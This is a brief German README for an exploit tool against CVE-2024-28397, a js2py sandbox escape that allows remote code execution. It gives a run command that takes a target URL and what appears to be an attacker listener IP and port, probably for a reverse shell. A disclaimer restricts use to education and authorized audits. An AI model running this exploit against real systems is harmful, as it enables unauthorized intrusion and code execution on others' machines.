
js2py <= 0.74 sandbox escape (CVE-2024-28397)
Exploit zur Remote-Befehlsausführung (RCE) durch Sandbox-Escape in js2py <= 0.74.
Ermöglicht die Ausführung von beliebigem Code auf dem Zielsystem durch unsichere JavaScript-Auswertung.
subprocess.PopenAbhängigkeiten:
pip install -r requirements.txt
python3 exploit.py -U http://target_url -H IP -P PUERTO
Dieses Projekt dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitsaudits.
Der Autor übernimmt keine Verantwortung für die missbräuchliche Verwendung dieses Tools.